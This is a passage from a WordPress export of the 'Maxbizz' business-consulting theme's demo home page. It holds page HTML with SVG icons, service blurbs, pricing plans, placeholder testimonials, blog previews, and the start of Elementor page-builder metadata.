</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/marketing-research/">Marketing Strategy</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/marketing-research/"class="link-details"> Learn More</a>
	        about company	        <h3>We Provide The Solutions  to Grow Your Business</h3>	    
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent into the firm, acquiring new companies, and developing new capabilities, for example, in design.</p>		
										<img width="204" height="52" src="https://maxbizz.s3.amazonaws.com/images/signature-home3.png" alt="" loading="lazy" />											
			<h6>Peter Adams</h6>		
		<p>co-founder of company</p>		
										<img width="570" height="430" src="https://maxbizz.s3.amazonaws.com/images/image1-home3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-home3.jpg 570w, https://maxbizz.s3.amazonaws.com/images/image1-home3-300x226.jpg 300w" sizes="(max-width: 570px) 100vw, 570px" />											
	        our services	        <h3>What We Offer for You</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Audit and Assurance</a></h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Sales and Marketing</a></h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Gross Tax Planning</a></h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M509.07,194.061L414.3,99.29c-3.906-3.905-10.24-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l87.697,87.696    l-51.274,51.273c-1.571,1.57-4.126,1.57-5.695,0l-101.25-101.249c-1.571-1.57-1.571-4.125,0-5.696l34.411-34.413    c3.906-3.906,3.906-10.24,0-14.147c-3.907-3.906-10.239-3.906-14.148,0l-34.411,34.411c-7.128,7.129-8.818,17.655-5.1,26.412    l-11.638,11.638h-44.877h-3.537h-32.955l-14.682-14.682c0.564-2.058,0.862-4.201,0.862-6.392c0-6.42-2.501-12.456-7.04-16.995    l-33.481-33.481c-3.907-3.906-10.239-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l33.482,33.481    c1.026,1.026,1.18,2.225,1.18,2.847s-0.153,1.821-1.181,2.848l-2.786,2.786l-98.495,98.471c-0.032,0.032-0.059,0.067-0.09,0.099    c-0.998,0.923-2.128,1.073-2.727,1.073c-0.623,0-1.822-0.153-2.848-1.179L24.15,201.114l88.876-88.875    c3.906-3.906,3.906-10.24,0-14.147s-10.238-3.906-14.148,0L2.93,194.041c-3.906,3.906-3.906,10.24,0,14.147l58.346,58.347    c4.687,4.686,10.841,7.028,16.995,7.028c2.826,0,5.646-0.518,8.329-1.507l32.843,32.843c-2.55,4.784-4,10.237-4,16.025    c0,18.853,15.338,34.191,34.191,34.191c0.042,0,0.084-0.003,0.126-0.003c0,0.002,0,0.004,0,0.006    c0,18.811,15.269,34.119,34.064,34.188c0,0.015-0.001,0.029-0.001,0.044c0,18.853,15.338,34.191,34.191,34.191    c5.8,0,11.265-1.456,16.055-4.015l12.227,12.227c5.732,5.732,13.354,8.889,21.46,8.889c8.107,0,15.729-3.157,21.46-8.889    c5.427-5.427,8.546-12.548,8.862-20.171c7.393-0.368,14.678-3.368,20.311-9.002c5.952-5.952,9.166-13.866,9.051-22.282    c0-0.018-0.001-0.035-0.001-0.053c8.703-0.54,16.71-4.354,22.63-10.805c5.951-6.482,8.896-14.656,8.87-22.81    c8.37-0.241,16.201-3.613,22.146-9.559c6.202-6.201,9.603-14.447,9.573-23.218c-0.017-5.164-1.229-10.132-3.49-14.608l32.81-30    c4.115,2.876,8.927,4.335,13.749,4.335c6.154,0,12.309-2.343,16.995-7.027l58.346-58.347    C512.976,204.301,512.976,197.967,509.07,194.061z M149.635,335.11c-7.822,0-14.185-6.363-14.185-14.185    c0-7.821,6.363-14.184,14.185-14.184c7.822,0,14.185,6.363,14.185,14.184C163.819,328.747,157.456,335.11,149.635,335.11z     M194.516,364.551c-0.407,0.386-0.804,0.781-1.192,1.186c-2.503,2.212-5.779,3.567-9.373,3.567    c-7.821,0-14.184-6.363-14.184-14.185s6.362-14.185,14.184-14.185s14.185,6.363,14.185,14.185    C198.135,358.743,196.758,362.042,194.516,364.551z M228.18,399.225c-0.046,0.044-0.095,0.082-0.14,0.127    c-0.05,0.05-0.091,0.104-0.139,0.154c-2.557,2.491-6.043,4.032-9.885,4.032c-7.823-0.002-14.186-6.365-14.186-14.186    c0-3.623,1.376-6.922,3.619-9.431c0.407-0.386,0.804-0.781,1.192-1.186c2.502-2.212,5.779-3.566,9.373-3.566    c7.821,0,14.185,6.363,14.185,14.185C232.199,393.19,230.663,396.669,228.18,399.225z M366.94,322.927    c-2.395,2.394-5.577,3.712-8.963,3.712s-6.568-1.318-8.963-3.711l-20.782-20.783c-3.906-3.906-10.238-3.906-14.148,0    c-3.906,3.906-3.906,10.24,0,14.147l20.781,20.782c0.001,0,0.002,0.001,0.002,0.001l0.063,0.063    c5.157,5.156,5.333,13.402,0.401,18.774c-2.478,2.7-5.859,4.257-9.522,4.385c-3.655,0.135-7.145-1.188-9.805-3.707l-20.011-18.942    c-4.013-3.798-10.344-3.625-14.142,0.388c-3.798,4.012-3.625,10.343,0.387,14.142l21.787,20.625    c2.157,2.042,3.367,4.802,3.408,7.772c0.041,2.97-1.093,5.762-3.193,7.862c-4.251,4.253-11.173,4.252-15.424,0l-10.101-10.101    c-3.907-3.906-10.239-3.906-14.148,0c-1.953,1.954-2.93,4.513-2.93,7.073s0.977,5.121,2.93,7.073l10.5,10.5    c1.954,1.954,3.03,4.551,3.03,7.313s-1.076,5.36-3.03,7.313c-1.954,1.954-4.551,3.029-7.313,3.029    c-2.763,0-5.359-1.076-7.313-3.03l-12.235-12.235c2.548-4.782,3.997-10.233,3.997-16.019c0-18.811-15.27-34.119-34.065-34.188    c0-0.015,0.001-0.029,0.001-0.044c0-18.853-15.338-34.191-34.191-34.191c-0.042,0-0.083,0.003-0.125,0.003    c0-0.002,0-0.004,0-0.006c0-18.853-15.338-34.19-34.191-34.19c-5.798,0-11.261,1.455-16.049,4.012l-31.265-31.264l88.44-88.441    l15.399,15.4c1.877,1.876,4.421,2.93,7.073,2.93h12.948l-39.486,39.486c-6.037,6.037-9.361,14.065-9.361,22.603    c0,8.538,3.324,16.565,9.361,22.602c6.037,6.038,14.065,9.362,22.603,9.362s16.566-3.325,22.603-9.362l33.491-33.492l36.665,0.402    l64.825,63.967c2.422,2.39,3.762,5.58,3.772,8.982C370.665,317.322,369.346,320.52,366.94,322.927z M374.169,284.024    l-60.938-60.131c-0.001-0.001-0.002-0.002-0.003-0.003l-0.088-0.087c-2.25-2.221-5.287-3.151-8.201-2.808l-43.539-0.477    c-2.7-0.02-5.28,1.027-7.183,2.929l-36.467,36.468c-2.259,2.259-5.262,3.502-8.455,3.502s-6.196-1.243-8.455-3.502    c-2.259-2.258-3.502-5.261-3.502-8.455c0-3.194,1.243-6.197,3.502-8.456l53.633-53.633h48.416c2.653,0,5.197-1.054,7.073-2.93    l13.328-13.328l82.237,82.237L374.169,284.024z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="438.336" cy="205.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="72.644" cy="206.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="131.064" cy="82.139" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="380.757" cy="81.338" r="9.983"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Support Functions</a></h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/" role="button">
						&nbsp; explore all services for business
					</a>
	        company benefits	        <h2>Global Reach with Local  Understanding</h2>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
										<img width="959" height="650" src="https://maxbizz.s3.amazonaws.com/images/image2-home3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image2-home3.jpg 959w, https://maxbizz.s3.amazonaws.com/images/image2-home3-300x203.jpg 300w, https://maxbizz.s3.amazonaws.com/images/image2-home3-768x521.jpg 768w" sizes="(max-width: 959px) 100vw, 959px" />											
	        <a href="https://vimeo.com/87959439">
					        </a>
	        how we help	        <h2>Align Costs with  Strategy & Focus  on Growth</h2>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg" alt="Accounting &amp; Finance"></a>					
						<h5><a href="#">Accounting & Finance</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg" alt="Managment Skills"></a>					
						<h5><a href="#">Managment Skills</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg" alt="Business Planning"></a>					
						<h5><a href="#">Business Planning</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
        	<h6>Trusted <br>Clients</h6>      				        
        	<h6>Finished <br>Projects</h6>      				        
        	<h6>Years of <br>Experience</h6>      				        
        	<h6>Visited<br>Conferences</h6>      				        
	        flexible pricing plans	        <h3>Choose The Best Plan</h3>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
            Billed Monthly
                <label>
                    <input type="checkbox">
                </label>
			Billed Yearly
				<h6>basic plan</h6>				<h2><sup>$</sup> 69</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 79</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 89</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>basic plan</h6>				<h2><sup>$</sup> 699</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 799</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 899</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
		        <a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06.svg" alt=""></figure></a>		    
	        testimonials	        <h3>What People Say About Us</h3>	    
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Oliver Simson</h6>							client of company						
										"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."			
							<h6>Mary Grey</h6>							client of company						
										"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."			
							<h6>Samanta Fox</h6>							client of company						
	        our blog	        <h3>Read Our Latest Insights</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					<article id="post-447">
									<a href="http://wpdemo.archiwp.com/maxbizz-business/category/business/" rel="category tag">business</a>									<a href="http://wpdemo.archiwp.com/maxbizz-business/contactless-payments-time-has-come/">
										<img width="600" height="400" src="https://maxbizz.s3.amazonaws.com/images/blog-1-1-600x400.jpg" alt="" loading="lazy" />									</a>
									<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/contactless-payments-time-has-come/" rel="bookmark">Contactless Payments’ Time Has Come</a></h5>
								<a href="http://wpdemo.archiwp.com/maxbizz-business/contactless-payments-time-has-come/" rel="bookmark"><time datetime="2020-09-04T09:09:22+00:00">September 4, 2020</time></a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/author/admin/">Tom Black</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/contactless-payments-time-has-come/#respond">0 Comments</a>								<a href="http://wpdemo.archiwp.com/maxbizz-business/contactless-payments-time-has-come/"></a>
					</article>
					<article id="post-430">
									<a href="http://wpdemo.archiwp.com/maxbizz-business/category/business/" rel="category tag">business</a> <a href="http://wpdemo.archiwp.com/maxbizz-business/category/marketing/" rel="category tag">marketing</a>									<a href="http://wpdemo.archiwp.com/maxbizz-business/the-future-of-retail-asias-ecosystems/">
										<img width="600" height="400" src="https://maxbizz.s3.amazonaws.com/images/gallery-1-1-600x400.jpg" alt="" loading="lazy" />									</a>
									<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/the-future-of-retail-asias-ecosystems/" rel="bookmark">The Future of Retail: Asia’s Ecosystems</a></h5>
								<a href="http://wpdemo.archiwp.com/maxbizz-business/the-future-of-retail-asias-ecosystems/" rel="bookmark"><time datetime="2020-02-24T09:00:43+00:00">February 24, 2020</time></a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/author/admin/">Tom Black</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/the-future-of-retail-asias-ecosystems/#respond">0 Comments</a>								<a href="http://wpdemo.archiwp.com/maxbizz-business/the-future-of-retail-asias-ecosystems/"></a>
					</article>
					<article id="post-434">
									<a href="http://wpdemo.archiwp.com/maxbizz-business/category/marketing/" rel="category tag">marketing</a>									<a href="http://wpdemo.archiwp.com/maxbizz-business/digital-transformation-roadmap-enablers/">
										<img width="600" height="400" src="https://maxbizz.s3.amazonaws.com/images/gallery-2-1-600x400.jpg" alt="" loading="lazy" />									</a>
									<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/digital-transformation-roadmap-enablers/" rel="bookmark">Digital Transformation Roadmap: Enablers</a></h5>
								<a href="http://wpdemo.archiwp.com/maxbizz-business/digital-transformation-roadmap-enablers/" rel="bookmark"><time datetime="2019-08-14T09:02:49+00:00">August 14, 2019</time></a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/author/admin/">Tom Black</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/digital-transformation-roadmap-enablers/#respond">0 Comments</a>								<a href="http://wpdemo.archiwp.com/maxbizz-business/digital-transformation-roadmap-enablers/"></a>
					</article>
			<a href="http://wpdemo.archiwp.com/maxbizz-business/blog/">view all</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1023</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 03:28:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 03:28:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[home]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"39dfd74","elType":"section","settings":{"margin":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true}},"elements":[{"id":"ec51567","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7817bd5","elType":"widget","settings":{"revslidertitle":"Slider 1","shortcode":"[rev_slider alias=\"slider-1\" slidertitle=\"Slider 1\"][\/rev_slider]"},"elements":[],"widgetType":"slider_revolution"}],"isInner":false}],"isInner":false},{"id":"8ae0d56","elType":"section","settings":{"background_background":"classic","background_color":"#F5F5F5","padding_tablet":{"unit":"px","top":"80","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"6075780","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"f4619a3","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"30","margin":{"unit":"px","top":"-60","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"z_index":1},"elements":[{"id":"0d48073","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"399a6a2","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance-2.svg","id":631},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-business\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""},"btn_text":"<i 